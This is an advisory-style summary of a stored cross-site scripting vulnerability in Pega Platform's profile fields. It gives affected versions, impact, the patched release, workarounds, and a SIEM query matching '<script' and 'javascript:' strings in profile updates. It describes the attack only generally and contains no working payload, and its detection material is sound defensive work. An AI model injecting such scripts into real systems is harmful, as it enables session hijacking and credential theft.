CVE-2024-12211
📋 TL;DR
Pega Platform versions 8.1 through Infinity 24.2.0 contain a stored cross-site scripting (XSS) vulnerability in profile functionality. This allows attackers to inject malicious scripts that execute when users view affected profiles. Organizations using vulnerable Pega Platform deployments are affected.
💻 Affected Systems
- Pega Platform
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, perform actions as authenticated users, deface interfaces, or redirect users to malicious sites through persistent script execution.
Likely Case
Attackers with access to profile editing could inject scripts that execute when other users view those profiles, potentially leading to session hijacking or credential theft.
If Mitigated
With proper input validation and output encoding, malicious scripts would be neutralized before execution, preventing successful exploitation.
🎯 Exploit Status
Requires authenticated access to profile editing; exploitation involves injecting script payloads into profile fields.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Infinity 24.2.1 and later
Vendor Advisory: https://support.pega.com/support-doc/pega-security-advisory-f24-vulnerability-remediation-note
Restart Required: Yes
Instructions:
1. Upgrade to Pega Platform Infinity 24.2.1 or later. 2. Apply the patch following Pega's deployment procedures. 3. Restart application servers. 4. Verify the fix is applied.
🔧 Temporary Workarounds
Input Validation Enhancement
allImplement additional input validation on profile fields to reject or sanitize script content
Customize Pega validation rules for profile fields
Output Encoding
allApply proper output encoding when displaying profile content to neutralize scripts
Configure Pega to encode output in profile display components
🧯 If You Can't Patch
- Implement web application firewall (WAF) rules to block XSS payloads
- Restrict profile editing permissions to trusted users only
🔍 How to Verify
Check if Vulnerable:
Check Pega Platform version; if between 8.1 and Infinity 24.2.0 inclusive, system is vulnerableCheck Version:
Check Pega Platform version in administrative console or via system propertiesVerify Fix Applied:
Verify version is Infinity 24.2.1 or later; test profile fields for script injection📡 Detection & Monitoring
Log Indicators:
- Unusual profile modifications
- Script-like content in profile update requests
Network Indicators:
- HTTP requests containing script tags in profile parameters
SIEM Query:
source="pega_logs" AND (event="profile_update" AND (message="*<script*" OR message="*javascript:*"))